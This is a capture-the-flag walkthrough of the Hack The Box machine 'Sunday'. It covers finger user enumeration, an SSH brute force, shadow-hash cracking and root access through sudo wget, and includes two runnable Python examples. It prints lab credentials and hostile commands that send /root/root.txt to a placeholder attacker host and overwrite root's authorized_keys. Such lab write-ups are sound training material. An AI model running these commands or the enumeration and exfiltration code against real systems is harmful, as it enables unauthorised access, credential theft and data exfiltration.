Basic information

Port scan

$ nmap -sT -Pn -p- --min-rate 5000 10.10.10.76
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-02-01 14:44 CST
Warning: 10.10.10.76 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.10.10.76
Host is up (0.075s latency).
Not shown: 65431 closed ports, 99 filtered ports
PORT STATE SERVICE
79/tcp open finger
111/tcp open rpcbind
22022/tcp open unknown
38408/tcp open unknown
52740/tcp open unknown

Nmap done: 1 IP address (1 host up) scanned in 1898.30 seconds

finger

Port 79 is a finger server, so enumerate users directly with finger-user-enum.pl against a names wordlist; two valid usernames come back:
./finger-user-enum.pl -U /usr/share/seclists/Usernames/Names/names.txt -t 10.10.10.76

sammy@10.10.10.76: sammy pts/2 <Sep 27 13:55> 10.10.16.26 ..
sunny@10.10.10.76: sunny pts/3 <Apr 24 10:48> 10.10.14.4 ..
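The enumeration above works because fingerd answers a query for a real account differently from a query for a nonexistent one. The following is an added example (not finger-user-enum.pl and not anything from the box) of that response-difference oracle: a minimal RFC 1288 client that sends `<user>\r\n` to port 79, takes the reply for a random name as the "unknown user" baseline, and reports every candidate whose normalised reply differs. The fake fingerd it talks to, and the reply text it returns, are constructed here so the script runs offline; the real 10.10.10.76 output format is not reproduced from the page.

```python
"""Finger (RFC 1288) user enumeration by response differencing, with an offline fake server."""
import socket
import socketserver
import threading

# Constructed sample replies, loosely modelled on a Solaris-style fingerd listing.
# They are test data for this example, not captured output from 10.10.10.76.
FAKE_HEADER = "Login       Name               TTY         Idle    When    Where\r\n"
FAKE_USERS = {
    "sammy": "sammy           ???                     pts/2    <Sep 27 13:55> 10.10.16.26\r\n",
    "sunny": "sunny           ???                     pts/3    <Apr 24 10:48> 10.10.14.4\r\n",
}


class FakeFingerHandler(socketserver.StreamRequestHandler):
    """Answers one finger query per connection, then closes (as fingerd does)."""

    def handle(self):
        user = self.rfile.readline().decode(errors="replace").strip()
        body = FAKE_USERS.get(user, f"{user:<16}???\r\n")  # unknown user: name column only
        self.wfile.write((FAKE_HEADER + body).encode())


def finger_query(host, port, user, timeout=5.0):
    """Send a single finger query and return the complete reply (server closes when done)."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(user.encode() + b"\r\n")
        chunks = []
        while True:
            data = s.recv(4096)
            if not data:
                break
            chunks.append(data)
    return b"".join(chunks).decode(errors="replace")


def normalize(reply, user):
    """Blank out the queried name and collapse whitespace so only structural differences remain."""
    return " ".join(reply.replace(user, "<U>").split())


def enumerate_users(host, port, candidates, baseline_name="zzqxjv7"):
    """Return {user: raw reply} for every candidate whose reply differs from the unknown-user baseline."""
    baseline = normalize(finger_query(host, port, baseline_name), baseline_name)
    found = {}
    for user in candidates:
        reply = finger_query(host, port, user)
        if normalize(reply, user) != baseline:
            found[user] = reply.strip()
    return found


def start_fake_server():
    srv = socketserver.ThreadingTCPServer(("127.0.0.1", 0), FakeFingerHandler)
    srv.daemon_threads = True
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv


def demo(candidates=("alice", "sammy", "bob", "sunny", "root")):
    """Run the enumeration against the fake fingerd on an ephemeral local port."""
    srv = start_fake_server()
    try:
        host, port = srv.server_address
        return enumerate_users(host, port, candidates)
    finally:
        srv.shutdown()
        srv.server_close()


if __name__ == "__main__":
    for user, reply in demo().items():
        print(f"{user}@fake: {reply.splitlines()[-1]}")
```

Against a real target, replace `demo()` with `enumerate_users("10.10.10.76", 79, names)`; the baseline trick also catches fingerd builds whose "no such user" wording differs from the one assumed here, which is why it is preferred over matching a fixed string.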

ssh brute force

ssh is on port 22022; a simple brute force yields a valid account and password:
sunny : sunday

Sunny

Then ssh in directly as sunny. ssh reports a key exchange error, because the server only offers diffie-hellman-group1-sha1, which modern OpenSSH clients no longer enable by default; the `+` re-enables that algorithm for this connection only:

ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 sunny@10.10.10.76 -p 22022

backup

The backup directory contains shadow.backup:

shadow crack

With sammy's line from shadow.backup saved as hash.txt, john cracks the password directly against rockyou:

sudo john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt

cooldude! (sammy)

user flag

Then ssh in as sammy and read user.txt:

Privilege escalation information

sudo -l shows that wget can be run as root without a password:

Exploitation:

root flag

There are many ways to abuse wget; 0xdf's writeup in the references lists six. The simplest is to read the root flag straight out of the error message wget prints when pointed at the file via the file protocol:
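Beyond the error-message trick, a password-less `sudo wget` gives two generic root primitives that do not depend on how wget formats its errors: an arbitrary file read via `sudo wget --post-file=/root/root.txt http://ATTACKER:PORT/` (wget sends the file verbatim as the POST body) and an arbitrary file write via `sudo wget -O /root/.ssh/authorized_keys http://ATTACKER:PORT/payload` (the GET response body is written to the path as root). What follows is an added example of the attacker-side listener that serves both, not code from this writeup or from 0xdf. The ATTACKER host and port, the payload string and the "root.txt" contents are all assumptions, and the two `fake_wget_*` functions stand in for the real wget invocations on the target so the script runs offline.

```python
"""Attacker-side HTTP listener for the sudo-wget read (--post-file) and write (-O) primitives."""
import http.client
import http.server
import threading

# Constructed payload that `wget -O /root/.ssh/authorized_keys` would drop; not a real key.
PAYLOAD = b"ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIEXAMPLEKEYEXAMPLEKEYEXAMPLEKEY attacker\n"


class Handler(http.server.BaseHTTPRequestHandler):
    captured = []  # bodies of every POST received, i.e. the files exfiltrated with --post-file

    def do_GET(self):
        # Whatever path the target fetches, answer with the payload so -O writes it to disk as root.
        self.send_response(200)
        self.send_header("Content-Length", str(len(PAYLOAD)))
        self.end_headers()
        self.wfile.write(PAYLOAD)

    def do_POST(self):
        # wget --post-file sends the file bytes as the body with a Content-Length header.
        length = int(self.headers.get("Content-Length", "0"))
        type(self).captured.append(self.rfile.read(length))
        self.send_response(200)
        self.send_header("Content-Length", "0")
        self.end_headers()

    def log_message(self, fmt, *args):
        pass  # keep the example quiet; a real listener would log the peer address


def start_listener(host="127.0.0.1", port=0):
    """Bind the listener (port 0 = ephemeral) and serve it on a background thread."""
    srv = http.server.ThreadingHTTPServer((host, port), Handler)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv


def fake_wget_post_file(host, port, file_bytes):
    """Stand-in for `sudo wget --post-file=/root/root.txt http://host:port/` run on the target."""
    conn = http.client.HTTPConnection(host, port, timeout=5)
    conn.request("POST", "/", body=file_bytes,
                 headers={"Content-Type": "application/x-www-form-urlencoded"})
    status = conn.getresponse().status
    conn.close()
    return status


def fake_wget_output_document(host, port):
    """Stand-in for `sudo wget -O /root/.ssh/authorized_keys http://host:port/payload`."""
    conn = http.client.HTTPConnection(host, port, timeout=5)
    conn.request("GET", "/payload")
    body = conn.getresponse().read()
    conn.close()
    return body


def demo():
    """Exercise both primitives against the local listener and return what each side saw."""
    srv = start_listener()
    try:
        host, port = srv.server_address
        secret = b"constructed-root-flag-contents\n"  # stands in for /root/root.txt
        status = fake_wget_post_file(host, port, secret)
        written = fake_wget_output_document(host, port)
        return {"post_status": status, "exfiltrated": Handler.captured[-1], "written": written}
    finally:
        srv.shutdown()
        srv.server_close()


if __name__ == "__main__":
    result = demo()
    print("exfiltrated:", result["exfiltrated"].decode().strip())
    print("would be written as root:", result["written"].decode().strip())
```

On a real engagement run `start_listener("0.0.0.0", 8000)` on the attacking box and issue the two wget commands from the sunny/sammy shell; the write primitive is the more dangerous one to leave behind, so restore any file you overwrite once you have root.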

References